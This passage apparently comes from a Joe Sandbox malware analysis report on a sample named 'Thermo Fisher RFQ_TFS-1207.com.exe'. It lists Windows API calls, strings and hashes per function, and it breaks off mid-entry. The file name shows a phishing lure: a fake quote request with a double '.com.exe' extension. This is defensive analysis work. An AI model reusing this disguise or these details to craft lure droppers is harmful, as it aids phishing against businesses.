                                              • Associated: 00000000.00000002.87353727574.0000000000786000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.87353727574.0000000000789000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.87353727574.00000000007A5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.87353727574.00000000007AB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.87353727574.00000000007B3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.87353727574.00000000007D1000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.87354320706.00000000007D7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_400000_Thermo Fisher RFQ_TFS-1207.jbxd
                                              Similarity
                                              • API ID: File$CloseGlobalHandleNamePathShortlstrlen$AllocAttributesCreateFreePointerSizelstrcpywsprintf
                                              • String ID: %ls=%ls$[Rename]$Mz$Uz$Uz
                                              • API String ID: 2171350718-3350566011
                                              • Opcode ID: a33c05bce7c125d61af8aa6c61577077044d65e406db0fd5498825754e73940b
                                              • Instruction ID: b6cadbeacbe634b6bd87c882f2c351c0ea44a21df7cd689b804f2f2a1cba60a5
                                              • Opcode Fuzzy Hash: a33c05bce7c125d61af8aa6c61577077044d65e406db0fd5498825754e73940b
                                              • Instruction Fuzzy Hash: 2F313770600715BBD2206B658D49F6B3A5CDF82714F16003EFE02F72D2DA7D982486BD
                                              APIs
                                              • DefWindowProcW.USER32(?,00000046,?,?), ref: 0040102C
                                              • BeginPaint.USER32(?,?), ref: 00401047
                                              • GetClientRect.USER32(?,?), ref: 0040105B
                                              • CreateBrushIndirect.GDI32(00000000), ref: 004010CF
                                              • FillRect.USER32(00000000,?,00000000), ref: 004010E4
                                              • DeleteObject.GDI32(?), ref: 004010ED
                                              • CreateFontIndirectW.GDI32(?), ref: 00401105
                                              • SetBkMode.GDI32(00000000,00000001), ref: 00401126
                                              • SetTextColor.GDI32(00000000,000000FF), ref: 00401130
                                              • SelectObject.GDI32(00000000,?), ref: 00401140
                                              • DrawTextW.USER32(00000000,007A7260,000000FF,00000010,00000820), ref: 00401156
                                              • SelectObject.GDI32(00000000,00000000), ref: 00401160
                                              • DeleteObject.GDI32(?), ref: 00401165
                                              • EndPaint.USER32(?,?), ref: 0040116E
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.87353660468.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                              • Associated: 00000000.00000002.87353631384.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.87353695868.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.87353727574.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.87353727574.000000000077C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.87353727574.0000000000782000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.87353727574.0000000000786000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.87353727574.0000000000789000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.87353727574.00000000007A5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.87353727574.00000000007AB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.87353727574.00000000007B3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.87353727574.00000000007D1000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.87354320706.00000000007D7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_400000_Thermo Fisher RFQ_TFS-1207.jbxd
                                              Similarity
                                              • API ID: Object$CreateDeleteIndirectPaintRectSelectText$BeginBrushClientColorDrawFillFontModeProcWindow
                                              • String ID: F
                                              • API String ID: 941294808-1304234792
                                              • Opcode ID: 0065e8d55c47ea3cbcda8c109104f1eee6ee8d4d6af800c5cfa02106002edbf4
                                              • Instruction ID: f4bc5d4286e22692ddece56c15c19c5fca937d6aefcb7484b61e28148d91a738
                                              • Opcode Fuzzy Hash: 0065e8d55c47ea3cbcda8c109104f1eee6ee8d4d6af800c5cfa02106002edbf4
                                              • Instruction Fuzzy Hash: 3F418A71804209AFCF058FA5CE459BFBBB9FF45314F00802EF591AA1A0CB389A55DFA4
                                              APIs
                                              • SetTimer.USER32(?,00000001,000000FA,00000000), ref: 00402FD6
                                              • MulDiv.KERNEL32(00093BE4,?,00093BE8), ref: 00403001
                                              • wsprintfW.USER32 ref: 00403011
                                              • SetWindowTextW.USER32(?,?), ref: 00403021
                                              • SetDlgItemTextW.USER32(?,00000406,?), ref: 00403033
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.87353660468.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                              • Associated: 00000000.00000002.87353631384.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.87353695868.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.87353727574.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.87353727574.000000000077C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.87353727574.0000000000782000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.87353727574.0000000000786000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.87353727574.0000000000789000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.87353727574.00000000007A5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.87353727574.00000000007AB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.87353727574.00000000007B3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.87353727574.00000000007D1000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.87354320706.00000000007D7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_400000_Thermo Fisher RFQ_TFS-1207.jbxd
                                              Similarity
                                              • API ID: Text$ItemTimerWindowwsprintf
                                              • String ID: verifying installer: %d%%$;$;
                                              • API String ID: 1451636040-142298927
                                              • Opcode ID: c24f39b73ea1f3b51e5f33cc7d94247a9242632f843dd5f1d8eee7270cd10b93
                                              • Instruction ID: 52c7d57b2d50c4e26d0c42f1be749ca1a93388b8845742b28701603c77c86054
                                              • Opcode Fuzzy Hash: c24f39b73ea1f3b51e5f33cc7d94247a9242632f843dd5f1d8eee7270cd10b93
                                              • Instruction Fuzzy Hash: 89016270640209BBEF209F60DD4AFEE3B79EB04344F10803AFA02B51D0DBB99A559F58
                                              APIs
                                              • CharNextW.USER32(?,*?|<>/":,00000000,"C:\Users\user\Desktop\Thermo Fisher RFQ_TFS-1207.com.exe",75F03420,C:\Users\user\AppData\Local\Temp\,00000000,0040350A,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,00403819,?,?,0000000A,?), ref: 00406865
                                              • CharNextW.USER32(?,?,?,00000000,?,?,0000000A,?,?,?,?,?,?,?,?,?), ref: 00406874
                                              • CharNextW.USER32(?,"C:\Users\user\Desktop\Thermo Fisher RFQ_TFS-1207.com.exe",75F03420,C:\Users\user\AppData\Local\Temp\,00000000,0040350A,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,00403819,?,?,0000000A,?), ref: 00406879
                                              • CharPrevW.USER32(?,?,75F03420,C:\Users\user\AppData\Local\Temp\,00000000,0040350A,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,00403819,?,?,0000000A,?), ref: 0040688C
                                              Strings
                                              • C:\Users\user\AppData\Local\Temp\, xrefs: 00406803
                                              • "C:\Users\user\Desktop\Thermo Fisher RFQ_TFS-1207.com.exe", xrefs: 00406846
                                              • *?|<>/":, xrefs: 00406854
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.87353660468.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                              • Associated: 00000000.00000002.87353631384.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.87353695868.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.87353727574.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.87353727574.000000000077C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.87353727574.0000000000782000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.87353727574.0000000000786000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.87353727574.0000000000789000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.87353727574.00000000007A5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.87353727574.00000000007AB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.87353727574.00000000007B3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.87353727574.00000000007D1000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.87354320706.00000000007D7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_400000_Thermo Fisher RFQ_TFS-1207.jbxd
                                              Similarity
                                              • API ID: Char$Next$Prev
                                              • String ID: "C:\Users\user\Desktop\Thermo Fisher RFQ_TFS-1207.com.exe"$*?|<>/":$C:\Users\user\AppData\Local\Temp\
                                              • API String ID: 589700163-1035651104
                                              • Opcode ID: d9890b2689dddc4776a4db6af1629ac80bd1bcc56ba6148264ccbff8cf15ab87
                                              • Instruction ID: 8a5b279eb1c6e0cea376d4f623a12da6f674b8daf8575b9a92ef11e753d0d18b
                                              • Opcode Fuzzy Hash: d9890b2689dddc4776a4db6af1629ac80bd1bcc56ba6148264ccbff8cf15ab87
                                              • Instruction Fuzzy Hash: D111B66780121299DB303B158C44AB766E8EF54794F52C03FED8A732C0E77C4C9286AD
                                              APIs
                                              • GetWindowLongW.USER32(?,000000EB), ref: 00404557
                                              • GetSysColor.USER32(00000000), ref: 00404595
                                              • SetTextColor.GDI32(?,00000000), ref: 004045A1
                                              • SetBkMode.GDI32(?,?), ref: 004045AD
                                              • GetSysColor.USER32(?), ref: 004045C0
                                              • SetBkColor.GDI32(?,?), ref: 004045D0
                                              • DeleteObject.GDI32(?), ref: 004045EA
                                              • CreateBrushIndirect.GDI32(?), ref: 004045F4
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.87353660468.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                              • Associated: 00000000.00000002.87353631384.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.87353695868.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.87353727574.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.87353727574.000000000077C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.87353727574.0000000000782000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.87353727574.0000000000786000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.87353727574.0000000000789000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.87353727574.00000000007A5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.87353727574.00000000007AB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.87353727574.00000000007B3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.87353727574.00000000007D1000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.87354320706.00000000007D7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_400000_Thermo Fisher RFQ_TFS-1207.jbxd
                                              Similarity
                                              • API ID: Color$BrushCreateDeleteIndirectLongModeObjectTextWindow
                                              • String ID:
                                              • API String ID: 2320649405-0
                                              • Opcode ID: 9dba601b91aff6ac4bf2e5f3eaee39d76022ea5146a5c84035e03d3d84c8d27c
                                              • Instruction ID: 9e725ab64d6b149d2d2f876944178e70108deb967c5ff43b0f72f150d1bef9aa
                                              • Opcode Fuzzy Hash: 9dba601b91aff6ac4bf2e5f3eaee39d76022ea5146a5c84035e03d3d84c8d27c
                                              • Instruction Fuzzy Hash: DA2177B1500704AFCB309F78DD18B5BBBF4BF41710B04892EEA96A22E0D739E944CB54
                                              APIs
                                              • SendMessageW.USER32(?,0000110A,00000009,00000000), ref: 00404EA9
                                              • GetMessagePos.USER32 ref: 00404EB1
                                              • ScreenToClient.USER32(?,?), ref: 00404ECB
                                              • SendMessageW.USER32(?,00001111,00000000,?), ref: 00404EDD
                                              • SendMessageW.USER32(?,0000113E,00000000,?), ref: 00404F03
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.87353660468.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                              • Associated: 00000000.00000002.87353631384.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.87353695868.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.87353727574.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.87353727574.000000000077C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.87353727574.0000000000782000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.87353727574.0000000000786000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.87353727574.0000000000789000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.87353727574.00000000007A5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.87353727574.00000000007AB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.87353727574.00000000007B3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.87353727574.00000000007D1000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.87354320706.00000000007D7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_400000_Thermo Fisher RFQ_TFS-1207.jbxd
                                              Similarity
                                              • API ID: Message$Send$ClientScreen
                                              • String ID: f
                                              • API String ID: 41195575-1993550816
                                              • Opcode ID: 3b05e908374c5eb3ed0cc07743cf8bdf4b6f619b857b2f4ef42225a5e6fc1927
                                              • Instruction ID: 20ba1dd8c6eb147b8de8e184d932bb38cbf2a2b27d4ef3642ae6e6b093867634
                                              • Opcode Fuzzy Hash: 3b05e908374c5eb3ed0cc07743cf8bdf4b6f619b857b2f4ef42225a5e6fc1927
                                              • Instruction Fuzzy Hash: D6015E72900219BADB00DB95DD85FFEBBBCAF95711F10412BBB51B61D0C7B49A018BA4
                                              APIs
                                              • GetDC.USER32(?), ref: 00401E76
                                              • GetDeviceCaps.GDI32(00000000,0000005A), ref: 00401E90
                                              • MulDiv.KERNEL32(00000000,00000000), ref: 00401E98
                                              • ReleaseDC.USER32(?,00000000), ref: 00401EA9
                                              • CreateFontIndirectW.GDI32(0040CDC8), ref: 00401EF8
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.87353660468.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                              • Associated: 00000000.00000002.87353631384.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.87353695868.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.87353727574.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.87353727574.000000000077C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.87353727574.0000000000782000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.87353727574.0000000000786000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.87353727574.0000000000789000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.87353727574.00000000007A5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.87353727574.00000000007AB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.87353727574.00000000007B3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.87353727574.00000000007D1000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.87354320706.00000000007D7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_400000_Thermo Fisher RFQ_TFS-1207.jbxd
                                              Similarity
                                              • API ID: CapsCreateDeviceFontIndirectRelease
                                              • String ID: Times New Roman
                                              • API String ID: 3808545654-927190056
                                              • Opcode ID: ef63408107684041e4866229634915ac86451c59f948bd83cb9cb27aef798f6a
                                              • Instruction ID: 03fa82d4c3f414405e360d431a269216209ac9bc2718b2d324fdabe448a9bb24
                                              • Opcode Fuzzy Hash: ef63408107684041e4866229634915ac86451c59f948bd83cb9cb27aef798f6a
                                              • Instruction Fuzzy Hash: 28018471954250EFEB015BB4AE89BDD3FB4AF59301F10497AF142BA1E2CAB90444DB3D
                                              APIs
                                                • Part of subcall function 6FE712BB: GlobalAlloc.KERNELBASE(?,?,6FE712DB,?,6FE7137F,00000019,6FE711CA,-000000A0), ref: 6FE712C5
                                              • GlobalFree.KERNEL32(?), ref: 6FE72743
                                              • GlobalFree.KERNEL32(00000000), ref: 6FE72778
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.87376840731.000000006FE71000.00000020.00000001.01000000.00000009.sdmp, Offset: 6FE70000, based on PE: true
                                              • Associated: 00000000.00000002.87376762635.000000006FE70000.00000002.00000001.01000000.00000009.sdmpDownload File
                                              • Associated: 00000000.00000002.87376915461.000000006FE74000.00000002.00000001.01000000.00000009.sdmpDownload File
                                              • Associated: 00000000.00000002.87376990254.000000006FE76000.00000002.00000001.01000000.00000009.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_6fe70000_Thermo Fisher RFQ_TFS-1207.jbxd
                                              Similarity
                                              • API ID: Global$Free$Alloc
                                              • String ID:
                                              • API String ID: 1780285237-0
                                              • Opcode ID: 606b494d0cac7c91db66fa8b140d5b348d6aaf1c86f94eba65c1d05aed7ae852
                                              • Instruction ID: c5a24983d2a96090b2d2d0fa85f3a4256ab2f87eadf6e21cbe56b02a14282d14
                                              • Opcode Fuzzy Hash: 606b494d0cac7c91db66fa8b140d5b348d6aaf1c86f94eba65c1d05aed7ae852
                                              • Instruction Fuzzy Hash: B931AB31505611EFCB268FA8DAC4C2A7FF7FB97314720462EE10183260CB306826DF62
                                              APIs
                                                • Part of subcall function 00406044: GetFileAttributesW.KERNELBASE(00000003,004030E2,C:\Users\user\Desktop\Thermo Fisher RFQ_TFS-1207.com.exe,80000000,00000003), ref: 00406048
                                                • Part of subcall function 00406044: CreateFileW.KERNELBASE(?,?,00000001,00000000,?,00000001,00000000), ref: 0040606A
                                              • GlobalAlloc.KERNEL32(?,?), ref: 004029D6
                                                • Part of subcall function 004034E7: SetFilePointer.KERNELBASE(00000000,00000000,00000000,00403267,?), ref: 004034F5
                                              • GlobalAlloc.KERNEL32(?,?,00000000,?), ref: 004029F2
                                              • GlobalFree.KERNEL32(?), ref: 00402A2B
                                              • GlobalFree.KERNEL32(00000000), ref: 00402A3E
                                                • Part of subcall function 004032D9: GetTickCount.KERNEL32 ref: 00403343
                                                • Part of subcall function 004032D9: GetTickCount.KERNEL32 ref: 004033C7
                                                • Part of subcall function 004032D9: MulDiv.KERNEL32(7FFFFFFF,?,?), ref: 004033F0
                                                • Part of subcall function 004032D9: wsprintfW.USER32 ref: 00403403
                                              • CloseHandle.KERNEL32(?,?,?), ref: 00402A5A
                                              • DeleteFileW.KERNEL32(?), ref: 00402A6D
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.87353660468.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                              • Associated: 00000000.00000002.87353631384.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.87353695868.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.87353727574.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.87353727574.000000000077C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.87353727574.0000000000782000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.87353727574.0000000000786000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.87353727574.0000000000789000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.87353727574.00000000007A5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.87353727574.00000000007AB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.87353727574.00000000007B3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.87353727574.00000000007D1000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.87354320706.00000000007D7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_400000_Thermo Fisher RFQ_TFS-1207.jbxd
                                              Similarity
                                              • API ID: FileGlobal$AllocCountFreeTick$AttributesCloseCreateDeleteHandlePointerwsprintf
                                              • String ID:
                                              • API String ID: 2082585436-0
                                              • Opcode ID: 39ffa233b977b71c875400693a81084305f2dbfc0f65c75d256c73d9bd221482
                                              • Instruction ID: ceca7db3f20ba128e09dabf3b87bd9784812185164ee1ab5f3c4a126dd6efce3
                                              • Opcode Fuzzy Hash: 39ffa233b977b71c875400693a81084305f2dbfc0f65c75d256c73d9bd221482
                                              • Instruction Fuzzy Hash: F6219C72D00118BFCF21AFA4DE888AEBE79FF48320B14422AF555762E0CB7948419F58
                                              APIs
                                              • GlobalFree.KERNEL32(00000000), ref: 6FE725C2
                                                • Part of subcall function 6FE712CC: lstrcpynW.KERNEL32(00000000,?,6FE7137F,00000019,6FE711CA,-000000A0), ref: 6FE712DC
                                              • GlobalAlloc.KERNEL32(?), ref: 6FE72548
                                              • WideCharToMultiByte.KERNEL32(00000000,00000000,?,?,00000000,?,00000000,00000000), ref: 6FE72563
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.87376840731.000000006FE71000.00000020.00000001.01000000.00000009.sdmp, Offset: 6FE70000, based on PE: true
                                              • Associated: 00000000.00000002.87376762635.000000006FE70000.00000002.00000001.01000000.00000009.sdmpDownload File
                                              • Associated: 00000000.00000002.87376915461.000000006FE74000.00000002.00000001.01000000.00000009.sdmpDownload File
                                              • Associated: 00000000.00000002.87376990254.000000006FE76000.00000002.00000001.01000000.00000009.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_6fe70000_Thermo Fisher RFQ_TFS-1207.jbxd
                                              Similarity
                                              • API ID: Global$AllocByteCharFreeMultiWidelstrcpyn
                                              • String ID:
                                              • API String ID: 4216380887-0
                                              • Opcode ID: 1b448e51862cb264c8effdb6add5fd40a2462c8d9fe2e56795c7252a9e6a4a70
                                              • Instruction ID: 325dbcfd428cbadb3ae620cc18a1f3bac2621b360edc69fcddcb29e3a2fd60b9
                                              • Opcode Fuzzy Hash: 1b448e51862cb264c8effdb6add5fd40a2462c8d9fe2e56795c7252a9e6a4a70
                                              • Instruction Fuzzy Hash: 0841D1B0408706EFD734DF69D850A267FF9FBA6314F204A1EE54586280EF34A585CF62
                                              APIs
                                              • RegEnumValueW.ADVAPI32(?,00000000,?,?,00000000,00000000,00000000,00000000,?,?,00100020,?,?,?), ref: 00402F22
                                              • RegEnumKeyW.ADVAPI32(?,00000000,?,00000105), ref: 00402F6E
                                              • RegCloseKey.ADVAPI32(?,?,?), ref: 00402F77
                                              • RegDeleteKeyW.ADVAPI32(?,?), ref: 00402F8E
                                              • RegCloseKey.ADVAPI32(?,?,?), ref: 00402F99
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.87353660468.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                              • Associated: 00000000.00000002.87353631384.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.87353695868.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.87353727574.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.87353727574.000000000077C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.87353727574.0000000000782000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.87353727574.0000000000786000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.87353727574.0000000000789000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.87353727574.00000000007A5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.87353727574.00000000007AB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.87353727574.00000000007B3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.87353727574.00000000007D1000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.87354320706.00000000007D7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_400000_Thermo Fisher RFQ_TFS-1207.jbxd
                                              Similarity
                                              • API ID: CloseEnum$DeleteValue
                                              • String ID:
                                              • API String ID: 1354259210-0
                                              • Opcode ID: 2404979ab5d72bd1f47e4c5d2100d154d2dcf156ce7fec90999c2a50aae3b712
                                              • Instruction ID: 9b286c5d8e76f57eb0c9cc6cf8757f48d710680964e76fdf16ae971aa0981de0
                                              • Opcode Fuzzy Hash: 2404979ab5d72bd1f47e4c5d2100d154d2dcf156ce7fec90999c2a50aae3b712
                                              • Instruction Fuzzy Hash: 64215A7150010ABFDF129F90CE89EEF7A7DEB14398F110076B909B21A0D7B48E54AA64
                                              APIs
                                              • GetDlgItem.USER32(?,?), ref: 00401DBF
                                              • GetClientRect.USER32(?,?), ref: 00401E0A
                                              • LoadImageW.USER32(?,?,?,?,?,?), ref: 00401E3A
                                              • SendMessageW.USER32(?,00000172,?,00000000), ref: 00401E4E
                                              • DeleteObject.GDI32(00000000), ref: 00401E5E
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.87353660468.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                              • Associated: 00000000.00000002.87353631384.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.87353695868.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.87353727574.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.87353727574.000000000077C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.87353727574.0000000000782000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.87353727574.0000000000786000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.87353727574.0000000000789000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.87353727574.00000000007A5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.87353727574.00000000007AB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.87353727574.00000000007B3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.87353727574.00000000007D1000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.87354320706.00000000007D7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_400000_Thermo Fisher RFQ_TFS-1207.jbxd
                                              Similarity
